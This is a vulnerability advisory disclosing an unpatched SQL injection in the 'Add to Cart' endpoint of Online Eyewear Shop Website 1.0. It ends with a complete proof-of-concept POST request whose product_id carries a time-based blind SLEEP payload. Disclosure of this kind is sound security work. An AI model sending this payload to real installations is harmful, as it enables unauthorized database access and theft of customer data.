- Online Eyewear Shop Website: 1.0
- Vulnerability Type: SQL Injection
- Severity: CRITICAL
- Status: Unpatched
classes/Master.php?f=add_to_card
A critical SQL injection vulnerability has been identified in the "Add to Cart" feature of the Online Eyewear Shop Website version 1.0. The flaw is triggered through the product_id parameter sent via a POST request to the endpoint classes/Master.php?f=add_to_card. Attackers can manipulate the product_id input to execute arbitrary SQL commands, leading to unauthorized access and potential data breaches.
This vulnerability compromises the backend database, allowing attackers to extract sensitive information or disrupt normal operations. As there is no patch available, the risk remains critical.
Below is an example of a malicious POST request exploiting the SQL injection vulnerability by tampering with the product_id parameter:
POST /classes/Master.php?f=add_to_card HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/?p=products/view_product&id=1
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f;
Connection: keep-alive
product_id=1' AND (SELECT 3879 FROM (SELECT(SLEEP(5)))odXD)-- XSxt
